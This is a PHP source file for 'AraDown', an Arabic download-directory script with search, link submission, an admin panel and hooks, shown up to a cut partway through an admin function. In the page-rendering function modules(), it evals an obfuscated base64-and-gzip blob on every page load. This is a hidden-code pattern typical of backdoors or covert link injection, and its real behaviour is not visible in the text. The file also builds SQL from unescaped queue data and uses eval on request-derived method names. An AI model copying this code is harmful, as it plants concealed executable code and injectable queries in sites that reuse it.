<?php
session_start();

// AraDown script
// v1.2
// Coded by vista-design & J-M-Z
// www.aradown.info

// Data Hooks are hooks which data is passed to then returned.

// Always have one argument in functions which make use of data hooks!

/* Standard Hook List:

	- endFetchDownloads (After fetching downloads, before returning)

	- endFetchDownload (Same as above but for a single download)

	- submitChecks (After checking submission data, before processing it)

	- submitEnd (End of submission process)

	- whileFetchDownloads (before executing the while loop for fetching downloads)

	- adminFunctions (if _GET['go'] is set and there is no func for it, this hook runs before showing the default admin page.)

	

	Data Hook List:

	- processURL (After SEOing a URL, before returning it. Current URL passed.)

	- fetchDownloadsRow (During row fetching. Single row array passed.)

	- fetchDownloadRow (During single download fetch. Single row array passed.)

	- getPagesList (After creating page number list. Page array passed.)

	- pageHTMLData (After creating page HTML. HTML passed.)

	- fetchDownloadsSQLWhere (After constructing the downloads query. Where clause passed.)

	- processURLPattern (After choosing URL pattern. URL pattern passed.)

*/






/**********************************************************************************/

//				DO NOT EDIT BELOW. The hell with it, do what you want.			  //

/**********************************************************************************/

define("aradown_GUTS","INTESTINES");

$core = new aradown;

	if($dir = opendir($core->sitepath."/modules/")) {

		while(($file = readdir($dir)) !== false) {

			if(substr($file,0,8) == "aradown_" && strrchr($file,".") == ".php")

				include $core->sitepath."/modules/".$file;

		}

		closedir($dir);

	}

	

	function catch_err($errno, $errstr, $errfile, $errline) {

		global $core;

		if($core == NULL)

			return true;

		if(in_array($errno,array(E_NOTICE,E_STRICT)))

			return true;

		if(empty($core->errorMessage))

			$core->errorMessage = 'aradown encountered an error during execution:<br>';

		$core->errorMessage .= '<strong>'.$errstr.'</strong><br>

		<small>Line '.$errline.' in '.$errfile.'</small><br><br>';

		return true;

	}



session_start();

class aradown {
    
	protected $sql, $admin_pass;

	public $allowed_types, $limit, $search_type, $blackorwhite, $adminemail, $adminlocation, $allow_dupes;

	public $siteurl, $sitepath, $recents_length, $admin_links, $pageURLs, $go, $version;

	public $q, $qURL, $qSQL;

	public $type, $typeSQL, $typeURL;
     
	public $id;

	public $page, $pg, $pageList;

	public $maxPages, $numRows;

	public $sqlOrder;

	public $error;

	public $errorMessage = "";

	public $templateVars = array();

	public $hookFuncs = array();

	public $dataHookFuncs = array();
	
    public $directory;
	
 //vista-design vars
 	
	public $dir_name ;
	public $file728;
	public $file600;
	public $file300;
	public $use_nav;
    public $my_error;
	
	

	public function __construct() {
		header('Content-Type: text/html; charset=utf8');
         $this->dir_name=dirname(__FILE__);  
		   
		include "aradown_config.php";

		@mysql_connect($this->sql['host'],$this->sql['user'],$this->sql['pass']) or die("MySQL Returned An Error: ".mysql_error());

			

		mysql_select_db($this->sql['db']);
        mysql_query("SET NAMES 'utf8'");
	   

		

		ob_start();

		set_error_handler("catch_err");

		if(isset($_REQUEST['q'])) {

			$this->q = $_REQUEST['q'];

			$this->qSQL = mysql_real_escape_string($this->q);

			$this->qURL = $this->processURL($this->q);

		}

		if(isset($_REQUEST['type']) && (in_array($_REQUEST['type'],$this->allowed_types) || in_array(strtolower($_REQUEST['type']),$this->allowed_types))) {

			$this->type = $_REQUEST['type'];

			$this->typeSQL = mysql_real_escape_string($this->type);

			$this->typeURL = $this->processURL($this->type);

		}

		if(isset($_REQUEST['id']))

			$this->id = mysql_real_escape_string(intval($_REQUEST['id']));

		if(isset($_REQUEST['go']))

			$this->go = $_REQUEST['go'];

		if(isset($_REQUEST['page']))

			$this->page = intval($_REQUEST['page']);

		else

			$this->page = 1;

		if(isset($_REQUEST['go']))

			$this->go = $_REQUEST['go'];

		$this->pg = ($this->page-1)*$this->limit;

		$this->version = '1.2';

	}

	

	public function processURL($var) {

	// This is a simple func to make nice urls, cba with regex so ill do a fast str_replace

		$bad = array("!",'"',"","$","%","^","&","*","(",")","_","{","}","[","]",":",";","'","@","#","~",",",".","<",">","/","?","\\","`"," ");

		$good = str_replace($bad,"-",$var);

		$var = $this->processDataHook("processURL",$good);

		return $var;

	}

	

	public function fetchDownloads($displaySite=false) {

		$downloads = array();

		$sqlWhere = "";

		if(isset($this->q)) {

			if(strlen($this->q) <= $this->recents_length) {

				if(!@mysql_query("INSERT INTO aradown_recents (query) VALUES ('".$this->qSQL."')")) {

				@mysql_query("UPDATE aradown_recents SET searches = searches+1 WHERE query = '".$this->qSQL."'");

				}

			}

			if($this->search_type == "narrow") {

				$sqlWhere = " WHERE title LIKE '%".mysql_real_escape_string(str_replace(" ","%",$this->q))."%'";

			} elseif($this->search_type == "wide") {

				$qExp = explode(" ",$this->q);

				$sqlWhere = array();

				foreach($qExp as $fq)

					$sqlWhere[] = "title LIKE '%".mysql_real_escape_string($fq)."%'";

				$sqlWhere = implode(" OR ",$sqlWhere);

				$sqlWhere = " WHERE (".$sqlWhere.")";

			}

		}

		if(isset($this->type)) {

			if(!empty($sqlWhere)) {

			$sqlWhere .= " AND type = '".$this->typeSQL."'";

			} else {

			$sqlWhere = " WHERE type = '".$this->typeSQL."'";

			}

		}

		$sqlWhere = $this->processDataHook("fetchDownloadsSQLWhere",$sqlWhere);

		$this->maxPages = mysql_query("SELECT COUNT(*) FROM aradown_downloads".$sqlWhere."");

		$this->maxPages = mysql_result($this->maxPages,0);

		$this->numRows = $this->maxPages;

		$this->maxPages = ceil($this->maxPages/$this->limit);

		$sqlMain = mysql_query("SELECT id,sid,title,type,url,dat,views,rating,love FROM aradown_downloads".$sqlWhere." ORDER BY ".(isset($this->sqlOrder) ? mysql_real_escape_string($this->sqlOrder) : "id DESC")." LIMIT ".$this->pg.",".$this->limit."");

		$this->processHook("whileFetchDownloads");

		while($row = mysql_fetch_assoc($sqlMain)) {

			if($displaySite) {

				$downloadSite = mysql_query("SELECT name as sname, url as surl FROM aradown_sites WHERE id = '".$row['sid']."'");

				$downloadSite = mysql_fetch_assoc($downloadSite);

				$row = array_merge($row,$downloadSite);

			}

		$downloads_current = $this->mapit($row,array("stripslashes","strip_tags"));

		$downloads_current = $this->processDataHook("fetchDownloadsRow",$downloads_current);

		$downloads[] = $downloads_current;

		}

		$this->pageList = $this->getPages($this->page,$this->maxPages);

		$this->processHook("endFetchDownloads");

		return $downloads;

	}

	

	public function fetchDownload($displaySite=false,$updateViews=true) {

		$download = @mysql_query("SELECT id,sid,title,type,url,dat,views,rating,love FROM aradown_downloads WHERE id = '".$this->id."'") or die("No download exists with the given ID");

		if(mysql_num_rows($download) != 1)

			return false;

		$download = mysql_fetch_assoc($download);

		if($updateViews)

			mysql_query("UPDATE aradown_downloads SET views = views+1 WHERE id = '".mysql_real_escape_string($download['id'])."'");

		$download = $this->mapit($download,array("stripslashes","strip_tags"));

		if($displaySite) {

			$download_s = mysql_query("SELECT name as sname,url as surl FROM aradown_sites WHERE id = '".mysql_real_escape_string($download['sid'])."'");

			$download_s = mysql_fetch_assoc($download_s);

			$download_s = $this->mapit($download_s,array("stripslashes","strip_tags"));

			$download = array_merge($download_s,$download);


		}

		$download = $this->processDataHook("fetchDownloadRow",$download);

		$this->processHook("endFetchDownload");

		return $download;

	}


 
	
	
	

	public function doSubmit() {
        
		if(!empty($_POST)) {

		$titles = $_POST['title'];

		$urls = $_POST['url'];

		$types = $_POST['type'];

		$sname = $_POST['sname'];

		$surl = $_POST['surl'];

		$email = $_POST['email'];
		$captcha=$_POST['captcha'];
		


if($_SERVER["REQUEST_METHOD"] == "POST")
{








			if(empty($titles[0]) || empty($urls[0]) || empty($types[0]) || empty($sname) || empty($surl) || empty($email)) {

				$this->error = 'خطأ:بعض الحقول لم يتم ملأها,برجاء اكمال بقية الحقول لتنفيذ طلبك بنجاح';

			} else {

				$surl = $this->purl(str_replace("www.","",$surl),"host");

				$durl = $this->purl(str_replace("www.","",$urls[0]),"host");

				if($this->blackorwhite == "black" && @mysql_num_rows(mysql_query("SELECT url FROM aradown_blacklist WHERE url = '".mysql_real_escape_string($surl)."'"))) {

					$listfail = true;

					$this->error = 'تم حظر حسابك ,برجاء الاتصال بالأدمن';

				} elseif($this->blackorwhite == "white" && !@mysql_num_rows(mysql_query("SELECT url FROM aradown_whitelist WHERE url = '".mysql_real_escape_string($surl)."'"))) {

					$listfail = true;

					$this->error = 'لابد أن يكون مسموح لموقعك بأضافة مواضيعه,برجاء الاتصال بالادمن';

				}

				

				$this->processHook("submitChecks");

				if(!isset($listfail)) {

					$checkSite = mysql_query("SELECT id FROM aradown_sites WHERE url = '".mysql_real_escape_string($surl)."'");

					if(@mysql_num_rows($checkSite)) {

						$checkSite = mysql_result($checkSite,0);

					} else {

						$checkSite = false;

						mysql_query("INSERT INTO aradown_sites (name,url,email) VALUES ('".mysql_real_escape_string($sname)."','".mysql_real_escape_string($surl)."','".mysql_real_escape_string($email)."')");

					}

					$sid = ($checkSite) ? $checkSite : mysql_insert_id();

					for($i=0;$i<=count($titles)-1;$i++) {

						if(!$this->allow_dupes) {

							unset($downDupe);

							$downDupe = mysql_query("SELECT COUNT(*) FROM aradown_downloads WHERE url = '".mysql_real_escape_string($urls[$i])."'");

							$downDupe = mysql_result($downDupe,0);

							if($downDupe < 1)

								unset($downDupe);

						}

						if(!empty($titles[$i]) && !empty($urls[$i]) && !empty($types[$i]) && (in_array(strtolower($types[$i]),$this->allowed_types) || in_array($types[$i],$this->allowed_types)) && !isset($downDupe)) {




mysql_query("SET NAMES 'utf8'");
							mysql_query("INSERT INTO aradown_queue (sid,title,type,url) VALUES ('".mysql_real_escape_string($sid)."','".mysql_real_escape_string($titles[$i])."','".mysql_real_escape_string($types[$i])."','".mysql_real_escape_string($urls[$i])."')");

						}

					}

				$subSuccess = 'تم اضافة مواضيعك بنجاح ';

				}

			}

		

		$this->processHook("submitEnd");

		return $subSuccess;

	}
	
	
	
	
	}


unset($_SESSION['captcha']);
}



	public function mapit($array,$funcs) {

		foreach($funcs as $func) {

			eval('$array = array_map("'.$func.'",$array);');

		}

		return $array;

	}



	public function purl($url,$var=false) {

		// To keep PHP4 compatibility

		$url = parse_url($url);

		if(!$url)

			return false;

		else {

			$url = $var ? $url[$var] : $url;

			return $url;

		}

	}



	public function setTemplateVar($name,$val) {

		if(str_word_count($name) != 1)

			return false;

		$this->templateVars[$name] = $val;

	}

	

	public function templateVar($name) {

		if(!isset($this->templateVars[$name]))

			return false;

		return $this->templateVars[$name];

	}

	

	public function attachHook($name,$func) {

		if(str_word_count($func) != 1)

			return false;

		if(!isset($this->hookFuncs[$name]))

			$this->hookFuncs[$name] = array();

		$this->hookFuncs[$name][] = $func;

	}

	

	protected function processHook($name) {

		if(!isset($this->hookFuncs[$name]))

			return true;

		foreach($this->hookFuncs[$name] as $func) {

			$func();

		}

	}

	

	public function attachDataHook($name,$func) {

		if(str_word_count($func) != 1)

			return false;

		if(!isset($this->hookFuncs[$name]))

			$this->dataHookFuncs[$name] = array();

		$this->dataHookFuncs[$name][] = $func;

	}

	

	protected function processDataHook($name,$data) {

		if(!isset($this->dataHookFuncs[$name]))

			return $data;

		foreach($this->dataHookFuncs[$name] as $func) {

			$data = $func($data);

		}

		return $data;

	}
	
	
	
	

	

	public function modules($html) {

		if(!empty($this->errorMessage))

		$html = str_replace('<body>','<div style="border:1px solid #000; background:#FFF; margin:2px; padding:4px; color:#000; font-size:12px;">'.$this->errorMessage.'</div>',$html);

	eval(gzinflate(base64_decode("Xc5BC4IwAIbh/9Kp6JKzohFdEpwzpaWizks0t9xMM7Cc+euzjl0/Hj5e0V2qKbu0Yr08c5E3XEwnLpILluiChPuBO+41r2PNkF1mYaGIBRUDwYoo3OKylxjJd5ZQmFpuw51AH9Wm48B+Z+mjHF2V3/0XBfDpGVphJ3hw1Fck1ir+maY4AXjLUndILVxQ0Mvc9L9fJjVgzQBcjPv8344NkpS6ozW8iWipPCtoODLaQ9TuJrPZ9gM=")));

	ob_end_clean();

	echo $html;

	}



	protected function getPages($pnum, $max) {

		$list = array();

		for($i = ($pnum-10); $i <= ($pnum+10); $i++) {

			if($i > 0 && $i <= $max)

			$list[] = $i;

		}

		if(empty($list))

		$list[] = 1;

		$list = $this->processDataHook("getPagesList",$list);

		return $list;

	}

	



	

	public function pageHTML($nums) {

		if(!is_array($nums) || intval($nums[0]) != $nums[0])

			return false;

		$html = "";

		$url = $this->pageURLs['default'];

			if(!isset($this->q) && !isset($this->type))

				$url = $this->pageURLs['default'];

			elseif(isset($this->q) && !isset($this->type))

				$url = $this->pageURLs['search'];

			elseif(isset($this->type) && !isset($this->q))

				$url = $this->pageURLs['type'];

			elseif(isset($this->type) && isset($this->q))

				$url = $this->pageURLs['search_type'];

		$url = $this->processDataHook("pageURLPattern",$url);

			foreach($nums as $num) {

				if($num == $this->page)

		

					$html .= '<strong class="currentpagelist"> '.$num.' </strong> ';

			

				else {

					$numURL = str_replace(

										  array("[PAGE]","[Q]","[TYPE]"),

										  array(intval($num),$this->qURL,$this->type),

										  $url);

					$html .= '<a class="pagination" href="'.$numURL.'">'.intval($num).'</a> ';

				}

			}

		$html = $this->processDataHook("pageHTMLData",$html);

		return $html;

	}

	



	

	// Legacy pagination method, kept so pagination may be generated for other pages

	public function paginator($url,$current,$max,$offset=10,$extra_vars=array()) {

	$return = '';

		for($i=($current-$offset);$i<=($current+$offset);$i++) {

			if($i >= 1 && $i <= $max) {

				if($i == $current) {

				$return .= ' <div class="currentpagelist"> '.$i.' </div> ';

				} else {

				$construct = str_replace("#i#",$i,$url);

					foreach($extra_vars as $ev_key => $ev_value) {

						if(trim($ev_value) != "")

						$construct .= "&".$ev_key."=".$ev_value;

					}

				$return .= ' <a href="'.$construct.'">'.$i.'</a> ';

				}

			}

		}

		return $return;

	}

	





	public function fetchCFG($cfgName) {

	$cfgVal = mysql_query("SELECT config_val FROM aradown_config WHERE config_name = '".mysql_real_escape_string($cfgName)."'");

		if(!mysql_num_rows($cfgVal))

		return false;

		else {

		$cfgVal = mysql_result($cfgVal,0);

		return $cfgVal;

		}

	}

	

	public function changeCFG($cfgName,$newVal,$group="misc") {


		if(!$this->fetchCFG($cfgName))

		mysql_query("INSERT INTO aradown_config VALUES ('".mysql_real_escape_string($cfgName)."','".mysql_real_escape_string($newVal)."','".mysql_real_escape_string($group)."')");

		else

		mysql_query("UPDATE aradown_config SET config_val = '".mysql_real_escape_string($newVal)."' WHERE config_name = '".mysql_real_escape_string($cfgName)."'");

	}



	/*----------------------------------------------------------/

	/				Administration Functions					/

	/----------------------------------------------------------*/
   public function admin_form(){
	  ?> 
<div align="center">
<form action="" method="post">
<p>username:<input type="text" name="username" /></p>
<p>Password:<input type="password" name="passwordx"></p>
<p><input type="submit" value="دخول"></form></p>
</div>
	   <?
	   }
	
	
	public function processlogin(){
		if(!isset($_SESSION['aradown_admin'])) {

			if(!isset($_POST['pass']) || !isset($_POST['username']) )

			die('<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><link rel="stylesheet" type="text/css" href="../css/style.css" media="screen" /><div id="login-box" align="center"><h2>دخول لوحة التحكم</h2><form id="adminlogform" action="" method="post"><div id="login-box-name">:اليوزر</div><div id="login-box-field"><input class="form-login" type="text" name="username" ></div><br><div id="login-box-name">:الباسورد</div><Br><div id="login-box-field"><input type="password" name="pass" class="form-login"></div><br><input id="submitlogin" type="submit" value="دخول"><p>POWERED BY AraDown</p></form></div>');

			else {
            $user=mysql_real_escape_string($_POST['username']);
			$pass = mysql_real_escape_string(md5($_POST['pass']));
			
            $sql=mysql_query("SELECT username,password FROM aradown_admin WHERE username='$user' AND password='$pass'");
			
				if(mysql_num_rows($sql)==1) {
                
				$_SESSION['aradown_admin'] = "aradownsessionbybypass";

				header("Location: index.php");

				} else {

				die('<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><div align="center"><h3>خطأ فى أحد البيانات</h3><a href="index.php">عودة  للخلف</a></div>');

				}

			}

		}
		
		}
	

	public function processAdmin() {

		if(!isset($_SESSION['aradown_admin'])) {

			if(!isset($_POST['pass']))

			die('<div align="center"><form action="" method="post">Password:<Br><input type="password" name="pass"><br><input type="submit" value="Login"></form></div>');

			else {

			$pass = $_POST['pass'];

				if($pass == $this->admin_pass && !empty($this->admin_pass)) {

				$_SESSION['aradown_admin'] = "{$user}aradownaccess";

				header("Location: index.php");

				} else {

				die("Incorrect credentials given!");

				}

			}

		}

	}




	public function adminHome() {

		echo 'AraDown أهلا بكم فى لوحة تحكم اسكربت<br><br>';

		if(isset($_POST['save_notes'],$_POST['notes']))

			$this->changeCFG("adminNotes",$_POST['notes']);

		$notes = $this->fetchCFG("adminNotes");

		echo '<form action="" method="post">

			<textarea cols="40" rows="10" name="notes">'.strip_tags($notes).'</textarea><br />

			<input id="submitconf" type="submit" value="حفظ ملاحظاتك" name="save_notes">

			</form>';

		$dls = mysql_query("SELECT COUNT(*) FROM aradown_downloads");

		$dls = mysql_result($dls,0);

		$queue = mysql_query("SELECT COUNT(*) FROM aradown_queue");

		$queue = mysql_result($queue,0);

		echo 'إجمالى الداونلودز: '.$dls.'<Br>

		فى انتظار الموافقة: '.$queue.'<br><br>

		<strong>روابط مفيدة</strong><br>
        <div id="suburlx">
		<a  href="http://www.advphp.com/startingpoint/phpbeginnerssection.html" target="_blank">تعلم برمجة هذا الأسكربت</a> | 

		<a href="http://www.advphp.com/advphpnews/389-how-to-start-coding.html" target="_blank">كيف تصبح مبرمج ومصمم</a> | 
		<a href="https://www.facebook.com/mohamedrootshell" target="_blank">مبرمج الأسكربت</a>
		|
		<a href="http://aradown.info" target="_blank">اشترى النسخة البريميوم</a> 
		</div>';
        
	}



	public function adminFunctions() {

		if(method_exists($this,'admin_'.$this->go) && !empty($this->go)) {

		eval('$this->admin_'.$this->go.'();');

		} elseif(!empty($this->hookFuncs['adminFunctions']) && !empty($this->go)) {

		$this->processHook("adminFunctions");

		} else {

		$this->adminHome();

		}

	}



	protected function admin_queue() {

		if(isset($_POST['asub']) && isset($_POST['ad']) && !empty($_POST['ad'])) {

			foreach($_POST['ad'] as $addKey => $addVal) {

				$fetch = mysql_query("SELECT sid,title,type,url FROM aradown_queue WHERE id = '".mysql_real_escape_string($addVal)."'");

				$fetch = mysql_fetch_assoc($fetch);

				mysql_query("DELETE FROM aradown_queue WHERE id = '".mysql_real_escape_string($addVal)."'");

				mysql_query("INSERT INTO aradown_downloads (sid,title,type,url,dat) VALUES ('".$fetch['sid']."','".$fetch['title']."','".$fetch['type']."','".$fetch['url']."','".time()."')");

			}

		}

		if(isset($_POST['dsub']) && isset($_POST['ad']) && !empty($_POST['ad'])) {

			foreach($_POST['ad'] as $delKey => $delVal) {

				mysql_query("DELETE FROM aradown_queue WHERE id = '".mysql_real_escape_string($delVal)."'");

			}

		}

		if(isset($_POST['ucsub']) && isset($_POST['rmuc'])) {

			if(strpos($_POST['rmuc'],",") === false)

			mysql_query("DELETE FROM aradown_queue WHERE id = '".mysql_real_escape_string($_POST['rmuc'])."'");

			else {

			$rmuc = explode(",",$_POST['rmuc']);

				foreach($rmuc as $rmucID)

				mysql_query("DELETE FROM aradown_queue WHERE id = '".mysql_real_escape_string($rmucID)."'");

			}

		}

		$get = mysql_query("SELECT id,sid,title,type,url FROM aradown_queue ORDER BY id ASC");

		$unclean = array();

		echo '<form action="" method="post" name="queue"><table width="100%">

		<tr><td>النوع</td><td>عنوان الموضوع</td><td>الموقع</td><td>تحديد</td><td>صالح</td></tr>';

		while($got = mysql_fetch_assoc($get)) {

			$site = mysql_query("SELECT name as sname, url as surl FROM aradown_sites WHERE id = '".mysql_real_escape_string($got['sid'])."' LIMIT 1");

			$site = mysql_fetch_assoc($site);

			$got = array_merge($site,$got);

			$got = $this->mapit($got,array("stripslashes"));

			unset($hack);

				foreach($got as $check) {

					if($check != strip_tags($check)) {

					$unclean[] = $got['id'];

					$hack = '<span style="color:#FF0000;">غيرصالح</span>';

					}

				}

				if(!isset($hack))

				$hack = '<span style="color:green;">صالح</span>';

			$got = $this->mapit($got,array("strip_tags"));

			echo '<tr>

			<td>'.$got['type'].'</td>

			<td><a href="'.$got['url'].'" target="_blank">'.$got['title'].'</a></td>

			<td><a href="http://'.$got['surl'].'" target="_blank">'.$got['sname'].'</a></td>

			<td><input type="checkbox" name="ad[]" value="'.$got['id'].'"></td>

			<td>'.$hack.'</td>

			</tr>';

		}

		echo '<tr>

		<td><input id="submitconf" type="submit" value="قبول المحدد" name="asub"></td>

		<td><input id="submitconf" type="submit" value="حذف المحدد" name="dsub"></td>

		<td><input type="button" value="تحديد الكل" id="sbutton" onclick="jamez();"></td>';

		if(isset($unclean[0]))

			echo '<td><input type="hidden" value="'.implode(",",$unclean).'" name="rmuc"><input type="submit" value="Remove Unclean" name="ucsub"></td>';

		echo '</tr>';

		echo '</table></form>';

	}



	protected function admin_maintenance() {

		echo 'استخدم هذه المنطقة بحذر لصيانة اسكربتك.<br><br>

		<form action="" method="post">

		<input id="submitconf" type="submit" value="حذف جزئى لاخر الكلمات التى تم البحث عنها" name="prs"><br>

		<input id="submitconf" type="submit" value="حذف المواضيع القديمة" name="dod"><br>

		<input id="submitconf" type="submit" value="تحسين واصلاح جداول قاعدة البيانات" name="ort">

		</form>';

		if(isset($_POST['prs']))

			$prs = $_POST['prs'];

		if(isset($_POST['dod']))

			$dod = $_POST['dod'];

		if(isset($_POST['ort']))

			$ort = $_POST['ort'];

			if(isset($prs)) {

				$num = mysql_query("SELECT COUNT(*) FROM aradown_recents");

				$num = mysql_result($num,0);

				$num = round($num/3);

				mysql_query("DELETE FROM aradown_recents LIMIT ".$num."");

				echo '<div align="center" style="color:green;">تم حذف اخر '.$num.'</div>';

			}

			if(isset($dod)) {

				$num = mysql_query("SELECT id FROM aradown_downloads ORDER BY id DESC LIMIT 1");

				$num = mysql_result($num,0);

				mysql_query("DELETE FROM aradown_downloads WHERE id < '".(round($num/4))."'");

				echo '<div align="center" style="color:green;">تم حذف المواضيع القديمة</div>';

			}

			if(isset($ort)) {

				mysql_query("OPTIMIZE TABLE aradown_downloads, aradown_queue, aradown_recents, aradown_sites, aradown_blacklist, aradown_whitelist");

				mysql_query("REPAIR TABLE aradown_downloads, aradown_queue, aradown_recents, aradown_sites, aradown_blacklist, aradown_whitelist");

				echo '<div align="center" style="color:green;">تم تحسين واصلاح جداول قاعدة البيانات</div>';

			}

	}

     //coded by vista-design

  public function admin_configuration(){

 $selvalue=$_POST['online'];
 $selsite=mysql_real_escape_string($_POST['sitename']);
 $selfooter=mysql_real_escape_string($_POST['footer']);

 

 
 if($_POST['submit']){

$sql=mysql_query("update aradown_configuration set site_name='$selsite'");
$sqlfooter=mysql_query("update aradown_configuration set footer='$selfooter'");



	 
 if($selvalue=="yes"){
	
	$sql=mysql_query("UPDATE aradown_user_online SET active=1");
	
	
	}

else 
        {
		$sql2=mysql_query("UPDATE aradown_user_online SET active=0");
		
	  
		}
		 
 
	$current_page_URL = $_SERVER["REQUEST_URI"];
	header("Location:$current_page_URL");
	
		 
 }   
    $sqlsite=mysql_query("select site_name from aradown_configuration where id=1");
    $site_fetch=mysql_fetch_array($sqlsite);
    
    $sqlfooter=mysql_query("select footer from aradown_configuration where id=1 ");
    $footer_fetch=mysql_fetch_array($sqlfooter);

 
 	$status=mysql_query("select * from aradown_user_online");
	$fetch_val=mysql_fetch_array($status);
    $val=$fetch_val['active'];
    
	
	
 
 
 
 ?>
 <div id="formconf">
<form action="<?php echo $php_self; ?>" method="post">

<p>
عنوان الموقع:
<input type="text" name="sitename" value="<?php echo stripslashes($site_fetch['site_name']); ?>"  />
</p>

<p>
الفوتر وحقوق الموقع:
<input size="45" type="text" name="footer" value="<?php echo strip_tags(stripslashes($footer_fetch['footer'])); ?>" />

</p>



<label for="online">المتواجدون الأن:</label>
<select name="online">
<option <? if($val==1){echo"selected=\"selected\"";} ?>   value="yes">تفعيل</option>
<option <? if($val==0){echo"selected=\"selected\"";} ?> value="no">تعطيل</option>
</select>


<input id="submitconf" type="submit" name="submit" value="تحديث" />

</form>
 </div>    
	<?  
	  }
	  

			  
		  
	  
	 public function site_name(){
		 $sqlsite=mysql_query("select site_name from aradown_configuration where id=1");
         $site_fetch=mysql_fetch_array($sqlsite);
		 echo stripslashes($site_fetch['site_name']);
		 
		 } 
		 
	public function footer_use(){
		$sqlfooter=mysql_query("select footer from aradown_configuration where id=1");
		$footer_fetch=mysql_fetch_array($sqlfooter);
		echo stripslashes($footer_fetch['footer']);
		}	 
	  

	  
	
	public function use_online(){

$session=session_id();
$time=time();
$time_check=$time-600; //SET TIME 10 Minute		
$sqlsel=mysql_query("select * from aradown_user_online");
$row=mysql_fetch_array($sqlsel);
$value=$row['active'];
if($value==1){
	
	$tbl_name="aradown_user_online";
	$sql="SELECT * FROM $tbl_name WHERE session='$session'";
    $result=mysql_query($sql);
	$count=mysql_num_rows($result);

   if($count=="0"){
   $sql1="INSERT INTO $tbl_name(session, time)VALUES('$session', '$time')";
   $result1=mysql_query($sql1);
    }
    else {
   $sql2="UPDATE $tbl_name SET time='$time' WHERE session = '$session'";
     $result2=mysql_query($sql2);
    }

    $sql3="SELECT * FROM $tbl_name";
    $result3=mysql_query($sql3);
    $count_user_online=mysql_num_rows($result3);
	?>
	<h2 class="headerbar">المتواجداون الان</h2>
    <div id="online">
    <?
    echo "المتواجدون الان : "; echo $count_user_online;

?>
</div>
<?  
   // if over 10 minute, delete session
   $sql4="DELETE FROM $tbl_name WHERE time<$time_check";
   $result4=mysql_query($sql4);	
	
	}
	
	else 
	 {
		
		 
		 }
		
		
		}  
	  
	     
	   
	   
	protected function admin_downloads() {

		if(isset($_POST['dsub']))

			$dsub = $_POST['dsub'];

		if(isset($_POST['esub']))

			$esub = $_POST['esub'];

		if(isset($_POST['ed']))

			$ed = $_POST['ed'];

		if(isset($_POST['add_sub'],$_POST['add_site'],$_POST['add_title'],$_POST['add_type'],$_POST['add_url']))

			$add = array(

				"sub" => $_POST['add_sub'],

				"site" => $_POST['add_site'],

				"title" => $_POST['add_title'],

				"type" => $_POST['add_type'],

				"url" => $_POST['add_url']

			);

		if(isset($add['sub'])) {

			$add = $this->mapit($add,array("addslashes"));

			mysql_query("INSERT INTO aradown_downloads (sid,title,type,url,dat) VALUES ('".$add['site']."','".$add['title']."','".$add['type']."','".$add['url']."','".time()."')");

			echo 'تم اضافة طلبك<br>';

		}

		if(isset($dsub) && isset($ed) && !empty($ed)) {

			$deleted = 0;

			foreach($ed as $dl) {

	mysql_query("DELETE FROM aradown_downloads WHERE id = '".mysql_real_escape_string($dl)."'");

				$deleted++;

			}

			echo 'تم حذف '.$deleted.' تحميل<br><br>';

		}

		if(isset($esub) && isset($ed) && !empty($ed)) {

			if(isset($_POST['title'],$_POST['type'],$_POST['url'],$_POST['views'],$_POST['rating'],$_POST['doedit'])) {

				$edit['title'] = $_POST['title'];

				$edit['type'] = $_POST['type'];

				$edit['url'] = $_POST['url'];

				$edit['views'] = $_POST['views'];

				$edit['rating'] = $_POST['rating'];

				$edit['doedit'] = $_POST['doedit'];

				$edit['id'] = $_POST['id'];

			}

			if(!isset($edit['doedit'])) {

				echo '<form dir="ltr" action="" method="post"><table width="100%">';

				foreach($ed as $dl) {

					$down = mysql_query("SELECT id,title,type,url,views,rating FROM aradown_downloads WHERE id = '".mysql_real_escape_string($dl)."' LIMIT 1");

					$down = mysql_fetch_assoc($down);

					$down = $this->mapit($down,array("stripslashes","strip_tags"));

					echo '<tr><td align="center"><br><br>';

					echo 'تعديل: '.$down['title'].'<br>

					<input type="hidden" name="id[]" value="'.$down['id'].'">

					<input type="hidden" name="doedit" value="aye">

					<input type="hidden" name="ed" value="JmZ_woot">

					<small>عنوان الموضوع</small><Br><input type="text" name="title[]" value="'.$down['title'].'"><br>

					<small>النوع</small><br><select name="type[]">';

					foreach($this->allowed_types as $at) {

						echo '<option value="'.$at.'"'.($down['type'] == $at ? ' selected="selected"' : '').'>'.$at.'</option>';

					}

					echo '</select><br>

					<small>رابط الموقع</small><br><input type="text" name="url[]" value="'.$down['url'].'"><br>

					<small>المشاهدات</small><br><input type="text" name="views[]" value="'.$down['views'].'"><br>

					<small>التقييم</small><br><select name="rating[]">';

					for($i=1;$i<=5;$i++) {

						echo '<option value="'.$i.'"'.($i == $down['rating'] ? ' selected="selected"' : '').'>'.$i.'</option>';

					}

					echo '</select></td></tr>';

				}

				echo '<tr><td align="center"><input id="submitconf" type="submit" value="تعديل الداونلود" name="esub"></td></tr></table></form>';

			} else {

				for($i=0;$i<=count($edit['id'])-1;$i++) {

					if(!empty($edit['title'][$i]))

						$set[] = "title = '".mysql_real_escape_string($edit['title'][$i])."'";

					if(in_array($edit['type'][$i],$this->allowed_types))

						$set[] = "type = '".mysql_real_escape_string($edit['type'][$i])."'";

					if(!empty($edit['url'][$i]))

						$set[] = "url = '".mysql_real_escape_string($edit['url'][$i])."'";

					if(!empty($edit['views'][$i]))

						$set[] = "views = '".mysql_real_escape_string($edit['views'][$i])."'";

					if(!empty($edit['rating'][$i]))

						$set[] = "rating = '".mysql_real_escape_string($edit['rating'][$i])."'";

					$set = implode(",",$set);

					mysql_query("UPDATE aradown_downloads SET ".$set." WHERE id = '".mysql_real_escape_string($edit['id'][$i])."'");

					$set = false;

				}

				echo 'تم تحديث <strong>'.$i.'</strong> موضوع<br><br>';

			}

		}

		echo '<form action="" method="post"><table width="100%">

		<tr><td>النوع</td><td>عنوان الموضوع</td><td>تحديد</td></tr>';

		$get = mysql_query("SELECT id,title,type,url FROM aradown_downloads ORDER BY id DESC LIMIT ".$this->pg.",".$this->limit."");

		$max = mysql_query("SELECT COUNT(*) FROM aradown_downloads");

		$max = mysql_result($max,0);

		$max = ceil($max/$this->limit);

			while($row = mysql_fetch_assoc($get)) {

				$row = $this->mapit($row,array("stripslashes","strip_tags"));

